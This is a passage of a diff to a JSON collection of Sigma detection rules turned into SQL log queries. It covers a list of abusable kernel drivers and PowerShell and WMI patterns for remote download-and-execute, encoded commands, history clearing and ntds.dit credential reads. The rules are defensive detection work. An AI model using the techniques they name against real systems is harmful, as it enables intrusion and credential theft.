'%\\\\blackbonedrv10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msio32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fiddrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutildrv2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\my.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio32a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wyproxy64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ni.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_i2cio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\protects.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phymem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proxy32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netproxydriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_hwmio64\\_w10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\physmem.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrsmartconnectdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\monitor\\_win10\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\poortry2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amdryzenmasterdriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sandra.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmix64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_i2c64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_6.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_rcio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zam64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio32b.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\poortry1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncpl.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nchgbios2x64.sys' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\bwrsh.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\panio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lha.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntbios.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\blacklotus\\_driver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fidpcidrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ucorew64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hwos2ec7x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmemx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows7-32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv106.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elbycdio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iomem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asupio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\otipcibus.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows-xp-64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswarpot.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amdpowerprofiler.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tgsafe.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntiolib\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrrapidstartdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hwos2ec10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank5.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viraglt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iomap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lv561av.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nscm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\c.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asribdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eneio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\80.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asio32.sys' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\iobitunlocker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zamguard64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nstrwsk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wiseunlo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t7.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_hwmio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hostnt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\glckio2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hpportiox64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\citmdrv\\_amd64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kevp64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmixp64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nbiolib\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\full.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflash.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtcore64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\speedfan.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fidpcidrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hwrwdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msrhook.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proxy64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\7.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hw\\_sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64b.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\semav6msr64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bandai.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\piddrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t8.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv103.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adv64drv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrsetupdrv103.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bwrs.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fiddrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\goad.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gametersafe.sys' ESCAPE 
'\\' OR ImageLoaded LIKE '%\\\\mhyprot2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lenovodiagnosticsdriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netflt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bw.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntbios\\_2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutil.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dh\\_kernel.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow8x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\superbmc.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nodedriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz141.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dh\\_kernel\\_10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\naldrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winiodrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asmmap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_namco.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iqvw64e.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nstr.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntiolib.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pciecubed.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vmdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atszio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\agent64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpupress.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\krpocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv102.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswvmm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tmcomm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_def.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmi.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\alsysio64.sys' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\cpuz.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amifldrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rwdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\testbone.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64c.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\procexp.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\se64a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\air\\_system10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcpu.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank6.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kbdcap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lctka.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflsh64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phlashnt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atszio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutil\\_2\\_3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phymemx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndislan.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\panmonfltx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\panmonflt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wyproxy32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\black.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vboxdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\poortry.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mydrivers.sys' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\winio64a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\openlibsys.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_flash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vproeventmonitor.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\piddrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sysinfo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv104.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netfilterdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libnicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\semav6msr.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pchunter.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asupio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rzpnk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magdrvamd64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elrawdsk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amp.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrautochkupddrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lgdcatcher.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fairplaykd.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\citmdrv\\_ia64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt5.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asromgdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv101.sys' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_stdin_services.yml" + "filename": "driver_load_win_vuln_drivers_names.yml" }, { - "title": "NTLMv1 Logon Between Client and Server", - "id": "e9d4ab66-a532-4ef7-a502-66a9e4a34f5d", + "title": "Suspicious Scripting in a WMI Consumer", + "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", "status": "experimental", - "description": "Detects the reporting of NTLMv1 being used between a client and server", - "author": "Tim Shelton", 
+ "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ "attack.execution", - "attack.t1550.002", - "attack.s0363" + "attack.t1059.005" ], "falsepositives": [ - "Environments that use NTLMv1" + "Legitimate administrative scripts" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'LsaSrv' AND EventID = '6038')" + "SELECT * FROM logs WHERE ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\'))" ], - "filename": "win_system_lsasrv_ntlmv1.yml" + "filename": "sysmon_wmi_susp_scripting.yml" }, { - "title": "smbexec.py Service Installation", - "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "title": "WMI Event Subscription", + "id": "0f06a3a5-6a09-413f-8743-e6cf35561297", "status": "test", - "description": "Detects the use of smbexec.py tool by detecting a specific service installation", - "author": "Omer Faruk Celik", + "description": "Detects creation of WMI event subscription persistence method", + "author": "Tom Ueltschi (@c_APT_ure)", "tags": [ - "attack.lateral_movement", - "attack.execution", - "attack.t1021.002", - "attack.t1569.002" + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + 
"Exclude legitimate (vetted) use of WMI event subscription in your network" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE EventID IN ('19', '20', '21')" ], - "filename": "win_system_hack_smbexec.yml" + "filename": "sysmon_wmi_event_subscription.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - System", - "id": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", - "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "PowerShell Decompress Commands", + "id": "1ddc1472-8e52-4f7d-9f11-eab14fc171f5", + "status": "test", + "description": "A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1140" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%rundll32.exe%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Expand-Archive%' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_via_rundll_services.yml" + "filename": "posh_pm_decompress_commands.yml" }, { - "title": "Windows Update Error", - "id": "13cfeb75-9e33-4d04-b0f7-ab8faaa95a59", - "status": 
"test", - "description": "Windows Update get some error Check if need a 0-days KB", - "author": "frack113", + "title": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module", + "id": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", + "status": "experimental", + "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", + "author": "Ensar Şamil, @sblmsrsn, OSCD Community", "tags": [ - "attack.impact", - "attack.resource_development", - "attack.t1584" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "App-V clients" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-WindowsUpdateClient' AND EventID IN ('16', '20', '24', '213', '217'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" ], - "filename": "win_system_susp_system_update_error.yml" + "filename": "posh_pm_syncappvpublishingserver_exe.yml" }, { - "title": "OilRig APT Schedule Task Persistence - System", - "id": "53ba33fd-3a50-4468-a5ef-c583635cfa92", + "title": "Clear PowerShell History - PowerShell Module", + "id": "f99276ad-d122-4989-a09a-d00904a5f9d2", "status": "experimental", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects keywords that could indicate clearing PowerShell history", + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", "attack.defense_evasion", - "attack.t1112", - 
"attack.command_and_control", - "attack.t1071.004" + "attack.t1070.003" ], "falsepositives": [ - "Unlikely" + "Legitimate PowerShell scripts" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\') OR (Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\')) OR ((Payload LIKE '%del%' ESCAPE '\\' OR Payload LIKE '%Remove-Item%' ESCAPE '\\' OR Payload LIKE '%rm%' ESCAPE '\\') AND Payload LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" ], - "filename": "win_system_apt_oilrig_mar18.yml" + "filename": "posh_pm_clear_powershell_history.yml" }, { - "title": "Remote Utilities Host Service Install", - "id": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", - "status": "experimental", - "description": "Detects Remote Utilities Host service installation on the target system.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Computer Machine Password by PowerShell", + "id": "e3818659-5016-4811-a73c-dde4679169d2", + "status": "test", + "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.initial_access", + "attack.t1078" ], "falsepositives": [ - "Legitimate use of the tool" + "Administrator PowerShell scripts" ], "level": "medium", "rule": [ - 
"SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%\\\\rutserv.exe%' ESCAPE '\\' AND ImagePath LIKE '%-service%' ESCAPE '\\') OR ServiceName = 'Remote Utilities - Host'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Reset-ComputerMachinePassword%' ESCAPE '\\')" ], - "filename": "win_system_service_install_remote_utilities.yml" + "filename": "posh_pm_susp_reset_computermachinepassword.yml" }, { - "title": "TacticalRMM Service Installation", - "id": "4bb79b62-ef12-4861-981d-2aab43fab642", - "status": "experimental", - "description": "Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Get-ADDBAccount Usage", + "id": "b140afd9-474b-4072-958e-2ebb435abd68", + "status": "test", + "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate use of the tool" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%tacticalrmm.exe%' ESCAPE '\\' OR ServiceName LIKE '%TacticalRMM Agent Service%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" ], - 
"filename": "win_system_service_install_tacticalrmm.yml" + "filename": "posh_pm_get_addbaccount.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - System", - "id": "175997c5-803c-4b08-8bb0-70b099f47595", + "title": "PowerShell Get Clipboard", + "id": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "description": "A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.collection", + "attack.t1115" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%new-object%' ESCAPE '\\' AND ImagePath LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ImagePath LIKE '%readtoend%' ESCAPE '\\' AND (ImagePath LIKE '%:system.io.compression.deflatestream%' ESCAPE '\\' OR ImagePath LIKE '%system.io.streamreader%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-Clipboard%' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_via_compress_services.yml" + "filename": "posh_pm_get_clipboard.yml" }, { - "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", - "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", + "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", "status": "experimental", - "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC 
negotiation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "win_system_kdcsvc_rc4_downgrade.yml" + "filename": "posh_pm_invoke_obfuscation_clip.yml" }, { - "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", - "id": 